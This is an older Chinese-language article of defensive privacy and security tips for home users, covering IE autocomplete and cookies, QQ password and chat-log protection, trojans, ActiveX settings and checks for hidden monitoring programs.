你可能会发现,当你用鼠标点击电子邮件的用户名登录框时,会列出曾经输入过的电子邮件地址;当你点击电子邮件的主题栏时,可能会列出曾经输入过的邮件标题;当你在论坛中的写帖子时的标题栏中也会列出曾经输入过的一些标题。所有这些表单中的信息都有可能会泄露你不想他人知道的信息。IE浏览器具有的“自动完成”功能存储了以前曾键入过的条目,因此当你下次填写表单的时候,会自动列出可能相符的项。
解决办法:要清除记录,可点击IE浏览器的“工具”→“Internet选项”→“内容”选项卡中的“自动完成”,然后点“清除表单”来清除自动完成历史记录。
#1四、网络聊天与邮件
当你在聊天室、论坛中胡说八道的时候,别以为没有人知道你来自何方,你的IP地址早已经被记录在案。当你用QQ聊天时,别人也有办法知道你的IP地址,只要到网上下载安装一个查IP地址的小工具,就可以看到你的IP地址,然后通过“追捕”软件查出你是哪个地方的(误报可能性大),所以别奇怪有人怎么会知道你的地理方位。
解决方案:如要想隐藏自己的IP地址,最有效的还是通过代理服务器上网。
如今网络黑客工具(木马程序)的泛滥,使得很多并非真正黑客的人也可以远程控制你的计算机,窃取你的信息。当别人用QQ或者E-mail向你发相片或者歌曲的时候,说不定你正在接收一个木马程序。计算机如果中了木马程序后,就没有什么秘密可言了。
解决方案:要防范黑客程序,除了不要下载来路不明的软件外,安装防火墙和反病毒程序是最有效的措施。如果你对网络安全性异常敏感,还应注意对Windows系统的安全漏洞打补丁。
你不但要防范来自网上的危险,你更要防范来自现实中的窃密者。在更多的情况下,你周围的人才是真正最危险的人。现在很多人都用QQ来聊天,也正是QQ成为泄露你秘密的主要渠道。针对QQ的窃密工具很多,可以偷窃密码、偷看聊天记录等,简直让人防不胜防。
解决方案:如果是网吧等公共场所使用QQ,聊天后最好把聊天记录删除。删除聊天记录主要有两种办法,如果你对电脑不太熟悉,可以点击QQ的“消息管理”,在弹出的“消息管理器”窗口中用右键点击你的号码(在左上角),然后点“删除消息”,就可以删除全部聊天记录,如果你觉得这些聊天记录对你很重要想要保存它,你可以在“消息管理”中,用右键点击自己的号码,再点击“导出聊天记录为文本文件”,把它们备份到软盘上或发到自己的邮箱保存后再删除硬盘上的聊天记录。有一定电脑使用经验的用户,可以采取第二种方法:到QQ所在的安装目录C:\Program Files\Tencent,删除以你自己的QQ号码命名的文件夹,别忘了还要清空回收站哦!从硬盘上删除该文件夹比第一种办法好,因为除了删除聊天记录外,还可在“一定程度上”防止他人用破解QQ密码的工具从这个文件夹中偷窃你的密码,请注意只是“在一定程度上”,因为还可以通过其他途径来偷窃密码。
在公共场所上网,要小心QQ号码被盗,可QQ号码被盗的现象依然不断。
解决方案:要防止QQ的密码被盗,还应注意几点:应尽快将QQ升级到更安全更完善的最新版本。此外最好不要以生日、 名字、电话号码等个人信息来作为密码,密码要复杂,不定期更换,当然也要方便你记忆。最好是数字加英文加标点符号,8∽16位最合适。如果你的密码长度很短或者太简单的时候,就容易被QQ密码猜解器在短时间内猜解出来。设置完密码后可以到腾讯网站申请密码保护功能,被盗后方便取回密码。
如今网上流传一些QQ密码窃取软件,运行它之后,在你输入密码登录QQ的同时记录密码到某个文件中,对这类软件很难防范,你不仅仅要注意QQ的密码被盗,你的其他密码也要小心被盗。很多人为了图省事,电子邮件和QQ是同一密码,但这样做存在严重的安全隐患,因为一旦一个密码被窃,就全线失守了。要完全防范别人偷你的密码,真的很不容易。最可怕的是一些在后台秘密监视计算机活动的软件,这些监视软件可以记录你使用电脑的所有过程,包括你的所有键盘键入,当然你的密码也都通通被记录(包括QQ密码、E-mail密码在内的所有密码全都暴露无遗)。要发现这类软件的踪迹很难,这类程序运行时,按“Ctrl+Alt+Del”也无法看到,反病毒软件也不监控这类软件。目前没有很好的办法来发现这类监视软件。
解决方案:到控制面板中的“添加/删除程序”属性中,看看里面有没有什么可疑的程序;另外就是从“开始”菜单中的“运行”中键入“msconfig”,在打开的“系统配置程序”之“启动”项中,查查有没有可疑的启动项。但是这些办法,都很不可靠。要比较彻底发现这类程序,可以使用winkill之类的内存驻留监控程序来监测有没有异常的情况,但是使用winkill来发现这类软件要求对计算机比较熟悉,使用起来也不方便,而且winkill只能发现可疑者而不能判断它究竟是不是“监视软件”。要防范这类程序真的很难,让你防不胜防,稍不注意你的秘密就全被暴露。你还有秘密吗?其实你已经没有了……
推荐]网上信息安全的防范技巧十三法
二十世纪九十年代末出现的INTERNET标志着人类社会已经进入了信息化时代,在这个时代,越来越多的人已经开始离不开Internet网络。然而在现有的Internet的环境中,君子风度和信任感已经所剩无几了。社会上能找到的所有的凶险, 卑鄙和投机, Internet上应有尽有。从Internet诞生之日起, 特别是自90年代它向公众开放以来, 它已经成为众矢之的。尤其是在一些电子商务网站进行购物,或者希望注册成为某些网站的会员的时候,我们要特别注意保护自己个人信息在网上的安全。这是因为我们通过表格来注册和提交个人信息时,程序会把这些信息打包发送到目的地,在传送到目的地的过程中需要经过一系列的网站中转,当然被传送的信息就很容易在所经过的网路上留下自己的踪迹,如果这些蛛丝马迹不幸被某些别有用心的人截获并加以利用,麻烦可就大了--虽然这种几率比较低,但面对如今一无法规二无规则、尚显无序的网络,总应该多加小心。下面,笔者就为各个用户提供一些保护网上信息安全的方法措施,希望能够对各位用户。
1、不轻易运行不明真相的程序
如果你收到一封带有附件的电子邮件,且附件是扩展名为EXE一类的文件,这时千万不能贸然运行它,因为这个不明真相的程序,就有可能是一个系统破坏程序。攻击者常把系统破坏程序换一个名字用电子邮件发给你,并带有一些欺骗性主题,骗你说一些:“这是个好东东,你一定要试试”,“帮我测试一下程序”之类的话。你一定要警惕了!对待这些表面上很友好、跟善意的邮件附件,我们应该做的是立即删除这些来历不明的文件。
2、屏蔽小甜饼信息
小甜饼就是Cookie,它是Web服务器发送到电脑里的数据文件,它记录了诸如用户名、口令和关于用户兴趣取向的信息。实际上,它使你访问同一站点时感到方便,比如,不用重新输入口令。但Cookies收集到的个人信息可能会被一些喜欢搞“恶作剧”的人利用,它可能造成安全隐患,因此,我们可以在浏览器中做一些必要的设置,要求浏览器在接受Cookie之前提醒您,或者干脆拒绝它们。通常来说,Cookie会在浏览器被关闭时自动从计算机中删除,可是,有许多Cookie会一反常态,始终存储在硬盘中收集用户的相关信息,其实这些Cookie就是被设计成能够驻留在我们的计算机上的。随着时间的推移,Cookie信息可能越来越多,当然我们的心境也因此变得越来越不踏实。为了确保万无一失,对待这些已有的Cookie信息应该从硬盘中立即清除,并在浏览器中调整Cookie设置,让浏览器拒绝接受Cookie信息。屏蔽Cookie的操作步骤为:首先用鼠标单击菜单栏中的“工具”菜单项,并从下拉菜单中选择“Internet选项”;接着在选项设置框中选中“安全”标签,并单击标签中的“自定义级别”按钮;同时在打开的“安全设置”对话框中找到关于Cookie的设置,然后选择“禁用”或“提示”。
3、不同的地方用不同的口令
对于经常上网的用户,可能会发现在网上需要设置密码的情况有很多。有很多用户图方便记忆,不论在什么地方,都使用同一个口令,殊不知他们已不知不觉地留下了一个安全隐患。因为攻击者一般在破获到用户的一个密码后,会用这个密码去尝试用户每一个需要甬道口令的地方!想想看,别人用一个口令慢慢地盗用你的帐号上网;再去偷看与冒发你的E-mail;也许还会用你的身份去聊天室损害你的形象;还有.....,想想看那后果该有多严重呀!所以笔者强烈建议各位用户,每个不同的地方用不同的密码,一定不能不同,同时要把各个对应的密码记下来,以备日后查用。另外一点就是我们在设定密码时,不应该使用字典中可以查到的单词,也不要使用个人的生日,最好是字母、符号和数字混用,多用特殊字符,诸如%、&、#、和$,并且在允许的范围内,越长越好,以保证你的密码不易被人猜中。
4、 屏蔽ActiveX控件
由于ActiveX控件可以被嵌入到html页面中,并下载到浏览器端加以执行,因此会给浏览器端造成一定程度的安全威胁。目前已有证据表明,在客户端的浏览器中,如IE中插入某些ActiveX控件,也将直接对服务器端造成意想不到的安全威胁。同时,一些其他技术,如内嵌于IE的VB Script语言,用这种语言生成的客户端可执行的程序模块,也同 Java小程序一样,有可能给客户端带来安全性能上的漏洞。此外,还有一些新技术,如ASP(Active serv er Pages)技术,由于用户可以为ASP的输出随意增加客户脚本、ActiveX控件和动态HTML,因此在ASP脚本中同样也都存在着一定的安全隐患。所以,用户如果要保证自己在因特网上的信息绝对安全,可以屏蔽掉这些可能对计算机安全构成威胁的ActiveX控件,具体操作步骤为:首先用鼠标单击菜单栏中的“工具”菜单项,并从下拉菜单中选择“Internet选项”;接着在选项设置框中选中“安全”标签,并单击标签中的“自定义级别”按钮;同时在打开的“安全设置”对话框中找到关于ActiveX控件的设置,然后选择“禁用”或“提示”。
5、定期清除缓存、历史记录以及临时文件夹中的内容
我们在上网浏览信息时,浏览器会把我们在上网过程中浏览的信息保存在浏览器的相关设置中,这样下次再访问同样信息时可以很快地达到目的地,从而提高了我们的浏览效率。但是浏览器的缓存、历史记录以及临时文件夹中的内容保留了我们太多的上网的记录,这些记录一旦被那些无聊的人得到,他们就有可能从这些记录中寻找到有关个人信息的蛛丝马迹。为了确保个人信息资料的绝对安全,我们应该定期清理缓存、历史记录以及临时文件夹中的内容。清理浏览器缓存并不麻烦,具体的操作方法如下:首先用鼠标单击菜单栏中的“工具”菜单项,并从下拉菜单中选择“Internet选项”;接着在选项设置框中选中“常规”标签,并单击标签中的“删除文件”按钮来删除浏览器中的临时文件夹中的内容;然后在同样的饿对话框中单击“清除历史记录”按钮来删除浏览器中的历史记录和缓存中的内容。
6、不随意透露任何个人信息
在网上浏览信息时,经常会发现需要用户注册自己个人信息资料的表单。这些站点通过程序设计达到一种不填写表单就不能获取自己需要的信息的目的。面对这种强迫用户注册个人信息的情况,我们最好的办法是不要轻易把自己真实的信息提交给他们,特别是不要向任何人透露你的密码。还有,在使用ICQ、OICQ等网络软件以及注册免费E-mail信息的时候,我们都需要填写一些个人资料。某些资料是必须填写的,自然无法略过。但是对于可填可不填但又涉及自己隐私的资料,还是能免就免,您有权利保持沉默,否则您所说的一切,有可能在网络上被黑客利用。这一沉默原则同样适用于聊天室,在弄清楚聊天室的环境和各个人物之前,使用虚拟的网名应该是明智的选择。你应该注意你常去的地方是不是把你的IP地址显示了出来,特别是在一些聊天室里,你一定要小心了!可能攻击你的人就是这样才能控制你的。因为我们拨号上网的用户IP是动态的,你每次上网的IP是服务器随机分配给你的,所以自己的IP如果不让人知道,是不会遭到袭击的。
7、突遇莫名其妙的故障时要及时检查系统信息
上网过程中,突然觉得计算机工作不对劲时,仿佛感觉有人在遥远的地方遥控你。这时,你必须及时停止手中的工作,立即按Ctrl+Alt+Del复合键来查看一下系统是否运行了什么其他的程序,一旦发现有莫名其妙的程序在运行,你马上停止它,以免对整个计算机系统有更大的威胁。但是并不是所有的程序运行时出现在程序列表中,有些程序例如Back Orifice(一种黑客的后门程序)并不显示在Ctrl+Alt+Del复合键的进程列表中,所以如果你的计算机中运行的是WIN98或者WIN2000操作系统,最好运行“附件”/“系统工具”/“系统信息”,然后双击“软件环境”,选择“正在运行任务”,在任务列表中寻找自己不熟悉的或者自己并没有运行的程序,一旦找到程序后应立即终止它,以防后患
以上是关于网络部分的主要内容,如果未能解决你的问题,请参考以下文章